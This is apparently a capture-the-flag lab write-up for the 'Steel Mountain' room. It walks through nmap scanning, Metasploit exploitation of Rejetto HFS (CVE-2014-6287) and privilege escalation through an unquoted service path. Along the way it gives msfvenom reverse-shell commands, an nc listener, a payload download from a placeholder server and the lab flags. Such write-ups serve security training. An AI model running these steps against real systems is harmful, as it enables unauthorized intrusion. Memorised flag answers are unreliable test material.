STEEL MOUNTAIN 

**************************************************************************************************************************

Task 1: Introduction 

[*] In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

[*] Deploy the machine 

[*] Target: 10.10.74.40

    [-] Go to the http://10.10.74.40/, we can see an image a man with title "Employee of the month".

        [+] We will see the page's source. 

        [+] His name is Bill Harper 

[Question]: Who is the employee of the month?

    [!] Answer: Bill Harper

**************************************************************************************************************************

Task 2: Initial Access 

[*] Now you have deployed the machine, lets get an initial shell!

[Question 1]: Scan the machine with nmap. What is the other port running a web server on?

    [-] nmap -sV -A -T5 10.10.74.40

        [+] Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 19:51 +07

            Nmap scan report for 10.10.74.40
            Host is up (0.21s latency).
            Not shown: 989 closed tcp ports (reset)
            PORT      STATE SERVICE            VERSION
            80/tcp    open  http               Microsoft IIS httpd 8.5
            |_http-title: Site doesn't have a title (text/html).
            | http-methods: 
            |_  Potentially risky methods: TRACE
            |_http-server-header: Microsoft-IIS/8.5
            135/tcp   open  msrpc              Microsoft Windows RPC
            139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
            445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
            3389/tcp  open  ssl/ms-wbt-server?
            | rdp-ntlm-info: 
            |   Target_Name: STEELMOUNTAIN
            |   NetBIOS_Domain_Name: STEELMOUNTAIN
            |   NetBIOS_Computer_Name: STEELMOUNTAIN
            |   DNS_Domain_Name: steelmountain
            |   DNS_Computer_Name: steelmountain
            |   Product_Version: 6.3.9600
            |_  System_Time: 2023-07-23T12:53:21+00:00
            | ssl-cert: Subject: commonName=steelmountain
            | Not valid before: 2023-07-22T12:42:16
            |_Not valid after:  2024-01-21T12:42:16
            |_ssl-date: 2023-07-23T12:53:25+00:00; 0s from scanner time.
            8080/tcp  open  http               HttpFileServer httpd 2.3
            |_http-server-header: HFS 2.3
            |_http-title: HFS /
            ....

    [!] Answer: 8080

[Question 2]: Take a look at the other web server. What file server is running?

[*] Connect to http://10.10.74.40:8080 

    [-] Search HFS in google and see this : Rejetto HTTP File Server => This is answer 

    [!] Answer: Rejetto HTTP File Server 

[Question 3]: What is the CVE number to exploit this file server?

[Research]: exploit-db.com/ 

    [-] Search: Rejetto 

        [+] We can see this: 

            Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution

            CVE: 2014-6287 

    [!] Answer: 2014-6287 

[Question 4]: Use Metasploit to get an initial shell. What is the user flag?

[*] We have hint: C:\Users\bill\Desktop

    [-] msf6 > search hfs

        Matching Modules
        ================

        #  Name                                        Disclosure Date  Rank       Check  Description
        -  ----                                        ---------------  ----       -----  -----------
        0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
        1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


        Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/rejetto_hfs_exec

    [-] msf6 > use 1
    
        No payload configured, defaulting to windows/meterpreter/reverse_tcp

        msf6 exploit(windows/http/rejetto_hfs_exec) > show options

        Module options (exploit/windows/http/rejetto_hfs_exec):

        Name       Current Setting  Required  Description
        ----       ---------------  --------  -----------
        HTTPDELAY  10               no        Seconds to wait before terminating web server
        Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
        RHOSTS     10.10.74.40                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
        RPORT      8080               yes       The target port (TCP)
        SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
                                                on all addresses.
        SRVPORT    8080             yes       The local port to listen on.
        SSL        false            no        Negotiate SSL/TLS for outgoing connections
        SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
        TARGETURI  /                yes       The path of the web application
        URIPATH                     no        The URI to use for this exploit (default is random)
        VHOST                       no        HTTP server virtual host


        Payload options (windows/meterpreter/reverse_tcp):

        Name      Current Setting  Required  Description
        ----      ---------------  --------  -----------
        EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
        LHOST     10.14.34.196     yes       The listen address (an interface may be specified)
        LPORT     4444             yes       The listen port

        [-] msf6 exploit(windows/http/rejetto_hfs_exec) > run

            [*] Started reverse TCP handler on 10.14.34.196:4444 
            [*] Using URL: http://10.14.34.196:8080/FgfLbYId6
            [*] Server started.
            [*] Sending a malicious request to /
            [*] Payload request received: /FgfLbYId6
            [*] Sending stage (175686 bytes) to 10.10.74.40
            [!] Tried to delete %TEMP%\JjCouHLEqer.vbs, unknown result
            [*] Meterpreter session 1 opened (10.14.34.196:4444 -> 10.10.74.40:49230) at 2023-07-23 20:09:13 +0700
            [*] Server stopped.

            meterpreter > 
            
            C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>cd C:\\Users\\bill
            cd C:\\Users\\bill


            C:\Users\bill>cd Desktop
            cd Desktop

            C:\Users\bill\Desktop>type user.txt
            type user.txt
            b04763b6fcf51fcd7c13abc7db4fd365

    [!] Answer: b04763b6fcf51fcd7c13abc7db4fd365

**************************************************************************************************************************

Task 3: Privilege Escalation

[*] Target: 10.10.74.40

[*] Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!

    [-] We will use a powershell script called PowerUp.

        [+] PowerUp.ps1 is designed to automate the process of finding common Windows privilege escalation vulnerabilities

        [+] It helps identify misconfigurations and weak configurations that can be leveraged to gain higher privileges on a compromised system

[Question 1]: What is the name of the service which shows up as an unquoted service path vulnerability?

    [!] Answer: AdvancedSystemCareService9

[Question 2]: What is the root flag?

[*] We have hint: To restart a service in Windows use the following command: sc start <service path name from question 2>

[*] Connect to here: https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 and download the script PowerUp.ps1 

    [-] git clone https://github.com/PowerShellMafia/PowerSploit.git 

        Cloning into 'PowerSploit'...
        remote: Enumerating objects: 3086, done.
        remote: Total 3086 (delta 0), reused 0 (delta 0), pack-reused 3086
        Receiving objects: 100% (3086/3086), 10.47 MiB | 5.47 MiB/s, done.
        Resolving deltas: 100% (1809/1809), done.

    [-] meterpreter > upload /home/vanhieu/Desktop/PowerSploit/Privesc/PowerUp.ps1

        [+] Uploading  : /home/vanhieu/Desktop/PowerSploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
        [+] Uploaded 586.50 KiB of 586.50 KiB (100.0%): /home/vanhieu/Desktop/PowerSploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
        [+] Completed  : /home/vanhieu/Desktop/PowerSploit/Privesc/PowerUp.ps1 -> PowerUp.ps1


    [-] meterpreter > ls

        Listing: C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
        ====================================================================================

        Mode              Size    Type  Last modified              Name
        ----              ----    ----  -------------              ----
        040777/rwxrwxrwx  0       dir   2023-07-23 20:09:13 +0700  %TEMP%
        100666/rw-rw-rw-  600580  fil   2023-07-23 20:40:26 +0700  PowerUp.ps1
        100666/rw-rw-rw-  174     fil   2019-09-27 18:07:07 +0700  desktop.ini
        100777/rwxrwxrwx  760320  fil   2014-02-17 03:58:52 +0700  hfs.exe

    [-] meterpreter > load powershell
        Loading extension powershell...Success.

        PS > . .\PowerUp.ps1
        PS > Invoke-Allchecks 

        ServiceName    : AdvancedSystemCareService9
        Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
        ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
        StartName      : LocalSystem
        AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
        CanRestart     : True
        Name           : AdvancedSystemCareService9
        Check          : Unquoted Service Paths

[*] msfvenom -p windows/shell_reverse_tcp LHOST=10.14.34.196 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

[*] C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvencedSystemCareService9
    sc stop AdvencedSystemCareService9

    SERVICE_NAME: AdvancedSystemCareService9 
            TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
            STATE              : 4  RUNNING 
                                    (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x0
            WAIT_HINT          : 0x0

    [-] cd C:\\Program\ Files\ (x86)\\IObit\\Advanced\ SystemCare
    
    [-] meterpreter > upload ASCService.exe 
        [+] Uploading  : /home/vanhieu/ASCService.exe -> ASCService.exe
        [+] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/vanhieu/ASCService.exe -> ASCService.exe
        [+] Completed  : /home/vanhieu/ASCService.exe -> ASCService.exe


    [-] C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemCareService9
        sc start AdvancedSystemCareService9

        SERVICE_NAME: AdvancedSystemCareService9 
                TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
                STATE              : 2  START_PENDING 
                                        (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
                WIN32_EXIT_CODE    : 0  (0x0)
                SERVICE_EXIT_CODE  : 0  (0x0)
                CHECKPOINT         : 0x0
                WAIT_HINT          : 0x7d0
                PID                : 1668
                FLAGS              : 


[*] After that:nc -lnvp 4443
                    listening on [any] 4443 ...
                    connect to [10.14.34.196] from (UNKNOWN) [10.10.183.53] 49202
                    Microsoft Windows [Version 6.3.9600]
                    (c) 2013 Microsoft Corporation. All rights reserved.

                    C:\Windows\system32>whoami
                    whoami
                    nt authority\system


C:\>type C:\Users\Administrator\Desktop\root.txt
        
    
    [!] Answer: 9af5f314f57607c00fd09803a587db80

**************************************************************************************************************************

Task 4: Access and Escalation Without Metasploit

[*] Now let's complete without the use of Metasploit. 

[*] To begin we shall be using the same CVE. However, this time let's use this exploit.

    [-] Connect to here: https://www.exploit-db.com/exploits/39161

[*] powershell -c "Get-Service"

    Status   Name               DisplayName                           
    ------   ----               -----------                           
    Running  AdvancedSystemC... Advanced SystemCare Service 9         
    Stopped  AeLookupSvc        Application Experience   
    .....

    [-] powershell -c "Invoke-WebRequest -Uri 'http://yourwebserver/payload.exe' -OutFile 'C:\path\to\payload.exe'"
        Invoke-WebRequest : The remote name could not be resolved: 'yourwebserver'
        At line:1 char:1
        + Invoke-WebRequest -Uri 'http://yourwebserver/payload.exe' -OutFile 

        [+] sc stop AdvancedSystemCareService9
            
        [+] sc start AdvancedSystemCareService9

[Question 1]: What powershell -c command could we run to manually find out the service name?

*Format is "powershell -c "command here"*

    [!] Answer: powershell -c "Get-Service"

**************************************************************************************************************************



